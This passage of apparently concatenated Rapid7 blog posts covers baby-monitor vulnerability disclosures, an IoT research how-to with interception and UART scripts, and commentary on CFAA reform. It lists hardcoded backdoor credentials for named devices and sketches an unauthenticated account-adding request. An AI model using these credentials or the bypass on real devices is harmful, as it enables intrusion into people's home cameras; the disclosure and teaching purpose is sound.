Device: Summer Baby Zoom WiFi Monitor & Internet Viewing System

The vendor's product site for the device assessed is http://www.summerinfant.com/monitoring/internet/babyzoomwifi.

 

Vulnerability R7-2015-13.1, Authentication Bypass (CVE-2015-2888)

An authentication bypass allows for the addition of an arbitrary account to any camera, without authentication.

The web service MySnapCam[4] is used to support the camera's functionality, including account management for access. A URL retrievable via an HTTP GET request can be used to add a new user to the camera. Requesting this URL does not require a valid session from any of the camera's administrators, so anyone who requests the URL with their own details against any camera ID will have access added to that device.

After a new user is successfully added, an e-mail will then be sent to an e-mail address provided by the attacker with authentication details for the MySnapCam web site and mobile application. Camera administrators are not notified of the new account.
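Since the actual URL is withheld here, the following is a purely hypothetical illustration of this class of bypass; every endpoint and parameter name below is invented:

```python
# Hypothetical unauthenticated GET that registers a new user against a
# target camera ID. Endpoint and parameters are invented for
# illustration; the real URL was not published in this disclosure.
import requests

params = {
    "cameraId": "123456",             # hypothetical target camera ID
    "email": "attacker@example.com",  # credentials get mailed here
    "name": "newuser",                # hypothetical account name
}
resp = requests.get("https://mysnapcam.example/user/add", params=params)
print(resp.status_code)  # note: no admin session was ever required
```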

 

Relevant URL

 

Vulnerability R7-2015-13.2, Privilege Escalation (CVE-2015-2889)

An authenticated, regular user can access an administrative interface that fails to check for privileges, leading to privilege escalation.

 

A "Settings" interface exists for the camera's cloud service administrative user and appears as a link in their interface when they login. If a non-administrative user is logged in to that camera and manually enters that URL, they are able to see the same administrative actions and carry them out as if they had administrative privilege. This allows an unprivileged user to elevate account privileges arbitrarily.

 

Relevant URL

 

Mitigations

In order to avoid exposure to the authentication bypass and privilege escalation, customers should use the device in a local network only mode, and use egress firewall rules to block the camera from the Internet. If Internet access is desired, customers should inquire about an update to Summer Infant's cloud services.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Tue, Sep 01, 2015: Confirmed receipt by vendor

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: Lens Laboratories

The issues for the Lens Laboratories device were disclosed to CERT under vulnerability note VU#931216.

 

Device: Lens Peek-a-View

The vendor's product site for the device assessed is http://www.amazon.com/Peek---view-Resolution-Wireless-Monitor/dp/B00N5AVMQI/

 

Of special note, it has proven difficult to find a registered domain for this vendor. All references to the vendor point at Amazon directly, but Amazon does not appear to be the manufacturer or vendor.

 

Vulnerability R7-2015-14, Backdoor Credentials (CVE-2015-2885)

The device ships with hardcoded credentials: a set accessible from a UART interface, which grants access to the underlying operating system, and sets accessible via the local web service, which give application access via the web UI.

Due to weak filesystem permissions, the local OS ‘admin’ account has effective ‘root’ privileges.

 

Operating System (via UART)

  • Username: admin
  • Password: 2601hx

 

Local Web Server

Site: http://{device_ip}/web/

  • Username: user
  • Password: user

 

Local Web Server

Site: http://{device_ip}/web/

  • Username: guest
  • Password: guest

 

Mitigations

In order to disable these credentials, customers should inquire with the vendor about a firmware update. UART access can be limited by not allowing untrusted parties physical access to the device. A vendor-provided patch should disable local administrative logins, and in the meantime, end-users should secure the device’s housing with tamper-evident labels.

 

Disclosure Timeline

Sat, Jul 04, 2015: Attempted to find vendor contact

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: Gynoii, Inc.

The issues for the Gynoii devices were disclosed to CERT under vulnerability note VU#738848.

 

Device: Gynoii

The vendor's product site for the device assessed is http://www.gynoii.com/product.html

 

Vulnerability R7-2015-15, Backdoor Credentials (CVE-2015-2881)

The device ships with hardcoded credentials, accessible via the local web service, giving local application access via the web UI.

 

Local Web Server

Site: http://{device_ip}/admin/

  • Username: guest
  • Password: guest

 

Local Web Server

Site: http://{device_ip}/admin/

  • Username: admin
  • Password: 12345

 

Mitigations

In order to disable these credentials, customers should inquire with the vendor about a firmware update.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: TRENDnet

The issues for the TRENDnet device were disclosed to CERT under vulnerability note VU#136207.

 

Device: TRENDnet WiFi Baby Cam TV-IP743SIC

The vendor's product site for the device under test is http://www.trendnet.com/products/proddetail.asp?prod=235_TV-IP743SIC

 

Vulnerability R7-2015-16: Backdoor Credentials (CVE-2015-2880)

The device ships with hardcoded credentials, accessible via a UART interface, giving local, root-level operating system access.

 

Operating System (via UART)

  • Username: root
  • Password: admin

 

Mitigations

In order to disable these credentials, customers should inquire with the vendor about a firmware update. UART access can be limited by not allowing untrusted parties physical access to the device. A vendor-provided patch should disable local administrative logins, and in the meantime, end-users should secure the device’s housing with tamper-evident labels.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Mon, Jul 06, 2015: Vendor reply, details disclosed to vendor

Sun, Jul 16, 2015: Clarification sought by vendor

Mon, Jul 20, 2015: Clarification provided to vendor

Tue, Jul 21, 2015: Disclosure to CERT

Wed, Sep 02, 2015: Public disclosure

 

 

Not Just Baby Monitors

As you can see, there were several new findings across a range of vendors, all operating in the same space. Here at Rapid7, we believe this is not unique to the video baby monitor industry in particular, but is indicative of a larger, systemic problem with IoT in general. We've put together a collection of IoT resources, including a whitepaper and a FAQ, covering these issues, which should fill you in on where we're at on this IoT security journey. Join us next week for a live webinar where Mark Stanislav and Tod Beardsley will discuss these issues further, or just use the #IotSec hashtag on Twitter to catch our attention with a question or comment.

 

In the meantime, keep an eye on those things keeping an eye on your infants and toddlers.

 

Update (Sep 02, 2015): Gynoii acknowledged the above research shortly after publication and are assessing appropriate patch strategies.

Update (Sep 02, 2015): iBaby Labs communicated that access token expiration and secure communication channels have been implemented.

Update (Sep 02, 2015): Summer Infant tweeted that all reported issues have been resolved.

Update (Sep 03, 2015): TRENDnet reports updated firmware available here (version 1.0.3), released on Sep 02, 2015.

 


[1] http://www.ifc0nfig.com/a-close-look-at-the-philips-in-sight-ip-camera-range/

[2] http://www.weaved.com/

[3] https://www.yoics.net

[4] http://www.mysnapcam.com/

Over the past couple of years I've dived into Internet of Things (IoT) security research and found it to be a rather fun (and sometimes terrifying) mixture of technologies, [in]delicately woven together to provide for some pretty useful, and not so useful, devices. It's a very exciting time right now as technologists navigate these nascent waters to determine which platforms, protocols, and languages will emerge as best-of-breed and drive IoT for years to come. We're at the HD-DVD v. Blu-Ray phase in a lot of ways, except there aren't just two players in the space, but thousands of organizations all trying to get their special new technology to be the cornerstone of a revolution.

 

Recently, I was invited to speak for the Plug and Play Tech Center as part of my mentorship for their Plug and Play Accelerator portfolio companies. In my presentation, I conveyed to the very people who are creating the newest generation of innovation what real-world security research has uncovered for those early participants in IoT. By explaining the security missteps of vendors and guiding the appropriate ways to avoid those mistakes in the future, my hope is that the audience left with actionable guidance to create a more safe and beneficial contribution to this world.

 

In this blog post I'd like to give a high-level sense of what IoT security research often entails. This is definitely not a comprehensive post; to accomplish that, I'd have to write a book and recruit about a dozen co-authors. This post is intended for the casual security researcher, or even IoT vendor, who wants to know what this research looks like and where to get started. I hope it spurs additional research into this space, because there's plenty of ground to cover.

 

IoT Has Many Avenues... Where to Start?

There's a long-winded excitement to IoT security research because in many cases there are a number of technology components involved, including mobile applications, Bluetooth, Wi-Fi, device firmware, services, APIs, and a variety of network protocols. Each of these has the potential to provide a researcher with new insight into the operation of the device or become a critical foothold to take a next step in the research process. Where you start with research covering this many areas is certainly a personal preference, but I happen to like to begin with the mobile application.

 

Mobile Applications

Because a mobile application is often central to the function of many IoT devices, the contents of the application are likely to provide clues about how the device operates and could even leak hardcoded credentials, protocol details, and keys. Since I am an iOS person, I often use Clutch on a jailbroken iPhone to provide me with an unencrypted version of the device's app. Once you have this, simple CLI tools like strings and otool are a good start to get a sense of what the application is up to.
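As a rough Python stand-in for that `strings` pass, a few lines will pull printable runs out of a decrypted binary; the keyword filter below is just an illustrative starting point:

```python
# Extract printable ASCII runs from a binary and surface likely
# secrets. Path comes from the command line; min_len is a heuristic.
import re
import sys

def extract_strings(path: str, min_len: int = 6):
    data = open(path, "rb").read()
    return [m.decode("ascii")
            for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

for s in extract_strings(sys.argv[1]):
    if any(hint in s for hint in ("http", "key", "passw", "secret")):
        print(s)
```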

 

Of course, more advanced application analysis is possible with tools like Hopper or IDA, but you'd be terrified what you can find without much trouble in these applications. Also, I highly recommend taking a look at Dan Mayer's awesome tool, idb, which will help streamline your iOS efforts with a nice GUI and integrated tooling to accomplish tasks more easily.

 

Inside the application, try and look for interesting classes, hardcoded strings, and other details that may provide privilege over the device never intended by the developer. I've found hardcoded root credentials, API keys for Amazon Web Services, URLs never meant to be known to end-users, and manufacturing network configurations. There can be a treasure trove of details if you look intently enough and a lot of flexibility if you instrument against a live application and see how it operates.

 

If you're interested in learning beyond these basics, check out Android Hacker's Handbook and/or the iOS Hacker's Handbook for in-depth knowledge from some of the best minds on each of their respective platforms.

 


Network Traffic

Once I've gotten into the mobile application and have seen what I can see, I like to start using the mobile application and begin interacting with the IoT device. This includes every step that I can witness, from setup to registration to normal usage. Using network analysis standbys such as mitmproxy, Wireshark, Burp Suite, and Ettercap, you can view connections from the mobile application to the device, and the device to the Internet. In many cases, you'll even be able to intercept SSL/TLS connections with little trouble using these types of tools. Some applications (and hopefully more in the future) utilize certificate pinning to thwart MITM attempts of encrypted connections, but of course there's always a way around that.
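For a concrete taste, a minimal mitmproxy addon for logging a companion app's cloud traffic might look like the following sketch (the vendor hostname is a hypothetical placeholder):

```python
# Run with: mitmproxy -s log_iot.py
# Logs requests from an IoT companion app to its cloud backend.
from mitmproxy import http

TARGET = "api.example-iot-vendor.com"  # hypothetical device cloud host

def request(flow: http.HTTPFlow) -> None:
    if TARGET in flow.request.pretty_host:
        print(flow.request.method, flow.request.pretty_url)
        # Tokens and API keys frequently appear in plain view here.
        for name, value in flow.request.headers.items():
            print(f"  {name}: {value}")
```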

 

By combining knowledge you gained through looking at the mobile application with live traffic, you can quickly understand how this device functions at a network level and start diving deeper into how it performs authentication, transport security, what inputs the components take, how outputs are rendered, platforms & frameworks being leveraged, and even see data that the developer perhaps never intended you to see. Whether web or mobile, applications often leak data unintentionally by developers who failed to scope a database lookup tightly enough, or send data over before it should have been sent. Whether by design or mistake, API calls and the resulting outputs can lead to some interesting findings.

 

Beyond simple network traffic, interception can actually lead to entire firmware images for the device. While older technologies may have required users to plug in a USB device with a firmware image loaded, IoT is heavily driven on over-the-air upgrades, often via Wi-Fi or cellular networks. Due to this, vendors aren't as likely to widely publish their firmware on FTP sites like you may have been used to with your older home routers. By observing network traffic at the right moment (e.g. user-requested firmware checks, vendor-pushed updates), analysis can lead to either downloading the entire firmware image while it's in transit, or a URL that contains firmware images when your device checks for updates.

 

Embedded Hardware


Investigating an IoT device's actual hardware can be quite beneficial to research, especially if you were unable to acquire the firmware via other methods. Further, physical access can quite often lead to administrative console access, giving a direct method to explore the operating system, applications, and configuration in a running environment. While an occasional device may provide network services like SSH or Telnet to connect to it, the credentials to login are rarely provided to end users. Thus, hardware may be one of the only ways to really gain hands-on access to the environment powering your research project's device. There are a number of standards related to hardware debugging that can lead to physical interaction with a device, such as JTAG and UART. Well known hardware hacking tools such as the Bus Pirate open up a new world of IoT research possibilities using these protocols and more.


In the case of JTAG, finding pins could provide deep access to the hardware, including capabilities to dump memory or halt the chipset. Because analyzing hardware test points to find the appropriate pins can be time consuming, Joe Grand created a device called the JTAGulator, which automates this process for both JTAG and UART. While the JTAGulator is great at identifying JTAG pins, it doesn't really do much with JTAG beyond basic sanity checks. I personally have a SEGGER J-Link that has numerous tools to interact with JTAG on IoT devices, allowing for tasks such as dumping memory via GDB.

 

While JTAG is made for deep, powerful control of hardware components, UART often provides a simple serial console connection to the device's operating environment. With either your existing JTAGulator, or a simple FTDI USB serial cable, software like minicom or screen is all that's needed to interact with a UART connection. Once connected via UART, a researcher can investigate the device from the inside-out, executing applications locally, exploring configuration files, and looking for new avenues of exploitation. While being able to download firmware, or dump memory, or analyze network traffic is hugely important, being able to work in the actual device's operating environment can be a major foothold in understanding how the device is working.
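If you prefer scripting the console over minicom or screen, a minimal pyserial sketch works too; the device path and 115200 baud below are common defaults but vary per board:

```python
# Poke a UART console via pyserial (`pip install pyserial`).
import serial

with serial.Serial("/dev/ttyUSB0", 115200, timeout=1) as console:
    console.write(b"\n")  # nudge the console for a login prompt
    print(console.read(4096).decode("utf-8", errors="replace"))
```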


Lastly, if you're still struggling to find firmware images, you may be lucky enough to have a device where the flash can be physically accessed with a testing clip for SOIC packages. A tool such as flashrom can easily leverage a device that speaks SPI to pull the firmware directly off of the flash while still attached to the device. I've personally had a great experience with Xipiter's custom device called the Shikra to pull firmware using flashrom when other tools had failed to get a clean dump of the image. Even better, Shikra also speaks UART and JTAG, too!


Wireless Communications


One reason IoT is so able to amaze us is its distinct lack of network tethering. Without thousands of feet of CAT-6 or serial cables lying around, IoT can exist in the form of everything from IP cameras to tiny water sensors. Today, standards like Wi-Fi, Bluetooth Low Energy (BLE), and ZigBee have changed what is possible over the air, enabling IoT innovators to continue to realize their creativity. Much like the other areas I've discussed, a special world of technologies exists to enable researchers to better understand the usage of these wireless protocols as the glue holding IoT function together.


Long-time Wi-Fi hackers are probably quite familiar with software like Kismet, but they may not realize that Kismet can do more than just Wi-Fi. In fact, using hardware such as an Ubertooth One, Kismet can provide Bluetooth capabilities to researchers. Alternatively, there are a number of Ubertooth tools capable of providing insight into Bluetooth traffic. If, however, you're more interested in ZigBee, Joshua Wright's KillerBee framework can be combined with an Atmel Raven USB to have a powerful assessment toolkit in a small form factor. Lastly, if you're really not playing around, a HackRF provides software defined radio (SDR) functionality that won't let you down.


IoT is a Fabric of Technologies

If you've been reading this post, you may be thinking, "...this just seems like a lot of existing technologies all bundled together..." -- bingo! You're all-but-guaranteed to have a broad experience in technologies, protocols, and platforms by diving into an IoT security research project. Due to the nascency of IoT, there are very few standardized aspects of a device you'll encounter, ensuring a fairly unique and exciting experience. Perhaps more intriguing is the reality that the research you perform could have a lasting impact on the direction that IoT moves by guiding vendors to make more secure choices.


One such initiative to help guide IoT down a safer path is called BuildItSecure.ly. By creating opt-in relationships with IoT vendors, small and large, the researchers at BuildItSecure.ly can help to inform and influence the decisions being made by the very innovators you're waiting on to release their next product. Vendors such as Dropcam, Pinoccio, Belkin, and Wink have all joined the initiative to work with world-class security researchers to make sure their products are more secure. While I am biased due to being a co-founder of the year-old initiative, I have to say that this sort of effort is exactly the kind of goodwill relationship that the research community needs more of, and I'm proud to see it resonating with those familiar with it.

 

I hope that this blog post has helped to inform you of the burgeoning world of IoT security research and that you'll decide to make one of the many devices out there a focus for your next project.

Anyone who read my breakdown on the President’s proposal for cybersecurity legislation will know that I’m very concerned that both the current version of the Computer Fraud and Abuse Act (CFAA), and the update recently proposed by the Administration, have and will have a strong chilling effect on security research. You will also know that I believe that the security community can and must play a central role in changing it for the better. This post is about how we do that.

 

A quick recap

The CFAA is currently worded in a very vague way that not only creates confusion and doubt for researchers, but also allows for a very wide margin of prosecutorial discretion in the way the statute is applied.  It contains both criminal and civil actions, the penalties for which are pretty harsh, and that increases the severity of the risk for researchers. Too often, we see the CFAA being used as a stick to threaten researchers by companies that are not willing or able to face up to their responsibilities, and don’t want to be publicly embarrassed for not doing so. These factors have resulted in many researchers deciding not to conduct or disclose research, or being forced into not doing so.

 

The new proposal is potentially worse. It makes the penalties even harsher and, while it does attempt to create more clarity on what is or is not fair game, it is worded in such a way that a great deal of research activity could be subject to legal action. For more details on that, look at the other post.

 

Still, I believe that opening the CFAA for discussion is A Good Thing. It affords us an opportunity to highlight the issues and propose some solutions. This latter part is where we stumble; we are frequently more comfortable pointing out weaknesses and failures than recommending solutions. We must move beyond this if our industry is to survive, and if we ever hope to create a more secure ecosystem.

 

While I believe everyone will pay the price if we cannot solve this problem – in the form of an inherently insecure ecosystem that threatens our privacy, our economy, and potentially our safety – the more immediate risk of imprisonment or other penalties is carried by researchers. In other words, no one is going to care more about this issue or be more motivated to fix it than us.

 

So how do we do that?

I've spent the past year asking and being asked that question, and unfortunately my answer right now is that I don’t know. Most people I know in the community agree with the basic premise of having an anti-hacking law of some kind, and we need to be careful that any effort to decriminalize research does not inadvertently create a backdoor in the law for criminals to abuse.

 

Finding a solution is tough, but I have faith in the extraordinary perseverance and intelligence of our community, and I believe together we can find a solution. That sounds like a cheesy cop out. What I mean is that while I don’t know in technical detail all the possible use cases that will test the law, I know great researchers that live them every day. And while I don’t know how to write law or policy, I know smart, experienced lawyers that do, and that care about this issue. And though I’m learning how to navigate DC, there are amazing people already well-engaged there that recognize the problem and advocate for change. Collaboration then is the key.

 

Getting started

As I said, I've spent a lot of time discussing this problem and potential solutions and I thought sharing some of that thought process might help kick start a discussion – not on the problem, but on a potential solution.

 

What we’re likely looking at here is an exemption or “carve out” to the law for research. Below are some ways we might think of doing that, all of which have problems – and here I am guilty of my own crime of flagging the problem without necessarily having a solution. Hopefully though this will stimulate discussion that leads to a proposed solution.

 

A role-based approach

One of the most common suggestions I've heard is that you exempt researchers based expressly on the fact that they ARE researchers. There are a few problems with this. Firstly, when I use the term “researcher” I mean someone that finds and discloses a security flaw. That could be a security professional, but it could just as easily be a student, child, or Joe Internet User who unintentionally stumbles on an issue while trying to use a website. People reporting findings for the first time have no way of establishing their credibility. Defining researchers is tough and likely defeats its own purpose.

 

I’ve heard the idea of some kind of registration for researchers being kicked around, and those outside the community will often point to the legal or medical professions where there is a governing body within the community that sets a mutually agreed bar and polices it. I can feel many shuddering as they read that – ours is not a community that enjoys the concept of conformity or being told what to do. Even if that evolves over time, registration and self-government don’t address the point above that ANYONE can be a researcher in the sense of uncovering a vulnerability.

 

Then too there is the sad fact that some people may work as “white hat” security professionals during the day, but by night they wear a different colored hat altogether (or a balaclava if you believe the stock imagery strewn across the internet). If they commit a crime they should be punished for it accordingly and should not have a Get Out of Jail Free card just because they are a security professional by day.

 

A behavior-based approach

Perhaps the easiest way to recognize research then is through behavior. There may be a set of activities we can point to and say “That is real research; that should be exempt.”

 

The major challenge with this is that much researcher behavior may not be distinguishable from the initial stages of an attack. Both a researcher and a criminal may scan the internet looking to see where a certain vulnerability is in effect. Both a researcher and a criminal may access sensitive personally identifiable information through a glitch on a website. It seems to me that what they do with that information afterwards would indicate whether they are a criminal or not, and as an aside, I would have thought most criminal acts would be covered by other statutes, e.g. theft, destruction of property, fraud. This is not how this law currently works, but perhaps it merits further discussion.

 

A problem with this could be that you would have to consider every possible scenario and set down rules for it, and that’s simply not feasible. Still, I think investigating various scenarios and determining what behavior should be considered “safe” is a worthwhile exercise. If nothing else, it can help to clarify what is risky and what is not under the current statute. Uncertainty over this is one of the main factors chilling research today.

 

This could potentially be addressed through an effort that creates guidelines for research behavior, allowing for effective differentiation between research and criminal activity. For example, as a community we could agree on thresholds for the number of records touched, number of systems impacted, or communication timelines. There are challenges with this approach too – for one thing we don’t have great precedents of the community adopting standards like this. Secondly, even if we could see something like this endorsed by the Department of Justice and prosecutors, it would not protect researchers from civil litigation.  And then there is the potential of forcing a timeline for self-identification, which would raise the likelihood of incomplete or inconclusive research, and the probability of “cease and desist” notifications over meaningful and accurate disclosures.

 

A disclosure-based approach

This again is about behavior, but focused exclusively around disclosure. The first challenge with this stems from that fact that anyone can be a researcher. If you stumble on a discovery, can you be expected to know the right way to disclose? Can you expect students and enthusiasts to know?

 

Before you get to that though, there is the matter of agreeing on a “right” way to disclose. Best practices and guidelines abound on this topic, but the community varies hugely in its views between full, coordinated, and private disclosures. Advocates of full disclosure will generally point to the head-in-the-ground or defensive response of the vast majority of vendors – unfortunately companies with an open attitude to research are still the exception, not the norm. And those companies are not the ones likely to sue you under the CFAA.

 

This does raise one interesting idea – basing the proposal not just on how the researcher discloses, but also on how the vendor responds. In other words, a vendor would only be able to pursue a researcher if they had also satisfied various requirements for responding to the disclosure. This would at least spread the accountability so that it isn’t solely on the shoulders of the researcher. Over time it would hopefully engender a more collaborative approach and we’d see civil litigations against researchers disappear.  This is the approach proposed in a recent submission for a security research exemption to the Digital Millennium Copyright Act (DMCA).

 

An intent-based approach

This brings me to my last suggestion, and the one that I think the Administration tried to lean towards in its latest proposal.

 

One of the criticisms of the current CFAA has long been that it does not consider intent.  That’s actually a bit of an over-simplification as it is always the job of the prosecutor to prove that the defendant was really up to no good. But essentially the statute doesn’t contain any actual provision for intent, or mens rea for those craving a bit of Latin.

 

This is the point at which I should remind you that I’m not a lawyer (I don’t even play one on TV). However, to the limited degree that I understand this, I do want to flag that the legal concept of intent is NOT the same as the common usage understanding of it. It’s not enough to simply say “I intended X.” or “I didn’t intend Y” and expect that it will neutralize the outcome of your actions.

 

Still, I’ve been a fan of an exemption based on intent for a while because, as I’ve already stated: 1) anyone can be a researcher, and 2) some of the activities of research and cybercrime will be the same. So I thought understanding intent was the only viable way to demarcate research from crime. It’s a common legal concept, present in many laws, hence there being a nice Latin term for it.  And in law, precedent seems to carry weight, so I thought intent would be our way in.

 

Unfortunately the new proposal highlights how hard this is to put into practice. It introduces the notion of acting “willfully”, which it defines as:

 

“Intentionally to undertake an act that the person knows to be wrongful.”

 

So now we have a concept of intent. But what does “wrongful” mean?  Does it mean I knowingly embarrassed a company through a disclosure, potentially causing negative impact to revenue and reputation? Does it mean I pressured the company to invest time and resources into patching an issue, again with a potential negative impact to the bottom line? If so, the vast majority of bona fide researchers will meet the criteria set out above to prove bad intent, as will media reporting on research, and anyone sharing the information over social media.

 

This doesn’t necessarily mean we should just abandon the idea of an intent-based approach. The very fact that the Administration introduced intent into their proposal indicates that there may be merit to pursuing this approach.  It could be a question of needing to fine-tune the language and test the use cases, rather than giving up on it altogether.  We may have the ability to clarify and codify what criteria demonstrates and documents good intent. What do you think?

 

Next steps

It’s time the security research community came up with its own proposal for improving the CFAA. It won’t be easy; most of us have never done anything like this before and we probably don’t know enough Latin. But it’s worth the effort of trying. Again, researchers bear the most immediate risk. And researchers are the ones that understand the issues and nuances best. It falls to this community then to lead the way on finding a solution.

 

The above are some initial ideas, but this by no means exhausts the conversation. What would you do? What have I not considered? (A lot certainly.) How can we move this conversation forward to find OUR solution?

 

~ @infosecjen

Last week, President Obama proposed a number of bills to protect consumers and the economy from the growing threat of cybercrime and cyberattacks. Unfortunately in their current form, it’s not clear that they will make us more secure. In fact, they may have the potential to make us more INsecure due to the chilling effect on security research. To explain why, I’ve run through each proposed bill in turn below, with my usual disclaimer that I’m not a lawyer.


Before we get into the details, I want to start by addressing the security community’s anger and worry over the proposal, particularly the Law Enforcement Provisions piece. The community is right to be concerned about the proposals in their current form, but there is some good news here, and an important opportunity for both the Government and the security community.


Firstly, it’s a positive sign that both the President and Congress are prioritizing cybersecurity and we're seeing scrutiny and discussion of the issues. There seems to be alignment between the Government and the security community on a few things too: for example, I think we agree that there needs to be more collaboration and transparency, and a stronger focus on preventing and detecting cyberattacks. Creating consistency for data breach notification is also a sensible measure.


Lastly, I’m excited to see the Computer Fraud and Abuse Act (CFAA) being opened for updating. Yes, the current proposal raises a number of serious concerns, but so does the version that is actively being prosecuted and litigated today. The security research community has wanted to see updates to the CFAA for a long time, and this is our opportunity to engage in that process and influence legislators to make changes that really WILL make us more secure.


The Critical Role of Research

One thing I want to applaud in the President’s position is the focus on prevention. Specifically, the Administration is advocating sharing information on threat indicators to create best practices and help organizations mount a defense. This is certainly important. Understanding attackers and their methods is something we talk about a great deal at Rapid7, and we definitely agree it’s a critical part of a company’s security program.


If we want to prevent attacks though, we need to do and know more. Opportunities for attackers abound across the internet within the technology itself, making effective defense an almost impossible task. Addressing this requires a shift in focus so we are building security into the very fabric of our systems and processes. We need flaws, misconfigurations, and vulnerabilities to be identified, analyzed, discussed, and addressed as quickly as possible. This is the only way we can meaningfully reduce the opportunity for attackers and increase cybersecurity.


Yet, at present, we do not encourage or support researchers and enable them to be effective. Rather, legislation like the CFAA creates confusion and fear, discouraging research efforts. Too often we see companies use this and other legislation as a stick to threaten (or beat) researchers with.


(One thing to note here is that when I use the term “researcher,” I am referring variously to security professionals, enthusiasts, tinkerers, and even Joe Internet User, who accidentally stumbles on a vulnerability or misconfiguration. It’s not easy to define what a security researcher is, which is one of the challenges with building a legislative carve-out for them.)


The defensive position described above is generally driven by conscientious business concerns for stability, revenue, reputation, and corporate liability. Though understandable, in the long term this approach only increases the risk exposure for the business and its customers. We need to change this status quo and create more collaboration between security experts and businesses if we want to prevent and effectively respond to cyberattacks.


Updating the Computer Fraud and Abuse Act

There’s a lot to discuss in the CFAA proposal, much of which raises concerns, so I’m just going to go through it all in turn as it appears in the proposal.


  • SEC 101 – Prosecuting Organized Crime Groups That Utilize Cyber Attacks


This is actually an amendment to the Racketeer Influenced and Corrupt Organizations Act (RICO), which basically allows the leaders of a criminal organization to be tried for crimes undertaken by others within that enterprise. The proposed amendment adds violations of the CFAA (18 U.S.C. § 1030) to the acts that can be subject to RICO. The concern is that the definition of “enterprise” is incredibly broad:

 

“Enterprise” includes any individual, partnership, corporation, association, or other legal entity, and any union or group of individuals associated in fact although not a legal entity;

 

The security industry is built on interaction and information sharing in online communities. We help each other tackle difficult technical challenges and make sense of data on a regular basis. If this work can be interpreted as an act of conspiracy, it will undermine our ability to effectively collaborate and communicate.

 

For a more specific example, let’s consider Metasploit, an open source penetration testing framework designed to enable organizations to test their security against attacks they may experience in the wild. Rapid7 runs Metasploit, so if a Metasploit module is used in a crime, would that make the leadership of Rapid7 a party to that crime? Would other Metasploit contributors also be implicated? This concern is just as valid for any other open source security tool.

 

  • SEC 103 – Modernizing the Computer Fraud and Abuse Act

 

(a)(2)(B) – In response to requests from the legal and academic communities, and circuit splits over prosecutions, this amendment aims to clarify that a violation of Terms of Service IS a crime under the CFAA if the actor:

a2B.png[ Image: text of the proposed (a)(2)(B) amendment ]

This is a big concern. Firstly, there is a general sense of disquiet over the idea of businesses being able to set and amend law as easily as they set and amend Terms of Service.

 

From a security research point of view, though, there is more to why this is concerning. The problem is highlighted in the definitions section:

Authorized access.png[ Image: proposed definition of authorized access ]

This essentially means any research activity a business does not like becomes illegal, provided the researcher knows the organization has banned it. While that does place a burden on the organization to state the ban (in its Terms of Service), it effectively means the end of internet-wide scanning efforts, which can be hugely valuable in identifying threats and understanding the reach and impact of issues. To be clear about what’s at stake, such scanning is typically nothing more invasive than a connection attempt, as sketched below.
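
For illustration only, here is a minimal sketch in Python of the kind of benign reachability check this sort of scanning typically performs (the host list and timeout values are hypothetical, and this is not Project Sonar’s actual code):

    import socket

    def smb_port_open(host, port=445, timeout=2.0):
        # Benign reachability check: does this host accept a TCP connection on port 445?
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False

    # Hypothetical targets (RFC 5737 documentation addresses), for illustration only.
    for host in ["192.0.2.1", "198.51.100.7"]:
        print(host, smb_port_open(host))

A probe this shallow touches no data on the target, yet under the proposed language even it could arguably become a crime the moment a site’s Terms of Service forbids it.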

 

The qualifiers are supposed to address this point, but do little to help. An organization can easily claim that the value of information uncovered in a research effort was more than $5,000. And government systems will be, and should be, included in an internet-wide research effort.

 

(a)(6) – This is another area of serious concern:

CFAA clip.png[ Image: text of the proposed (a)(6) amendment ]

There are four key parts to this:

1) “Willfully” – Interestingly, this word seems to be the Administration’s attempt to introduce intent as a means of drawing a line between criminal acts and those that might appear the same but are actually bona fide. In other words, this piece might be key to separating research from criminal activity. 


The problem lies in the definition of “willfully,” and the concept of “prosecutorial discretion”. The amendment defines “willfully” as follows:

"Intentionally to undertake an act that the person knows to be wrongful”

 

Unfortunately, this definition begs for another definition. What does “wrongful” mean? A company embarrassed by a research disclosure could argue that the researcher intentionally caused injury to its reputation and customer confidence, and that the disclosure was therefore wrongful.

 

Regarding “prosecutorial discretion” – there are a lot of prosecutors, and they vary greatly in their level of technical and security understanding, and their reasons for pursuing cases. It’s the anomaly cases – the occasional extremes of questionable prosecutions – that drive the most press coverage, giving a somewhat distorted view of the idea of prosecutorial discretion in the security community. As a result, there is little trust between prosecutors and security researchers, and it only takes the POSSIBILITY of prosecution for research to be chilled. In addition, the CFAA is both criminal and civil legislation, and we have seen motivated organizations take a more aggressive approach with their application of this law. 

 

2) “Traffics” – This word is incredibly broadly defined. For example, in his blog post on the CFAA proposal, security researcher Rob Graham imagines a scenario in which an individual could be prosecuted for retweeting a tweet containing a link to a data dump. Coupled with the lack of clarity around intent to do wrong, this raises a concern that the security community will be penalized purely for being inherently snarky, highly active on the internet, and interested in security information.

 

3) “Any other means of access” – In some cases this could refer to the public disclosure of a vulnerability, as it could be argued that disclosure provides a “means of access”. If a researcher publishes a proof-of-concept exploit to highlight how a vulnerability works, this would very likely be considered a means of access, as would exploit code provided for penetration testing purposes. This language effectively makes research disclosure all but illegal.

 

4) “Knowing or having reason to know that a protected computer would be accessed or damaged without authorization” – You can make an argument that anyone in the security community always has this knowledge. We know that there are cybercriminals and that they are attacking systems across the internet. If we disclose research findings, we know that some criminals may try to use them to their advantage, but we believe many are ALREADY using the vulnerability to their advantage without security professionals having a chance to defend against them. This is why disclosure is so important – it enables (sometimes forces) issues to be addressed so organizations can protect themselves and their customers.


(c) – Penalties. The amendment increases the penalties for CFAA violations. For researchers concerned about the issues above, the harsher penalties increase the risk and further discourage them from undertaking research or disclosing findings.


So, all in all, there are some serious concerns with the CFAA proposal, which can be summarized like this: it could chill security research to such a degree that it seriously undermines US businesses and the internet as a whole. That sounds melodramatic, and perhaps it is, but I’ve heard from a great many researchers that the proposal would stop them from conducting research altogether. The risk level would simply be too great.


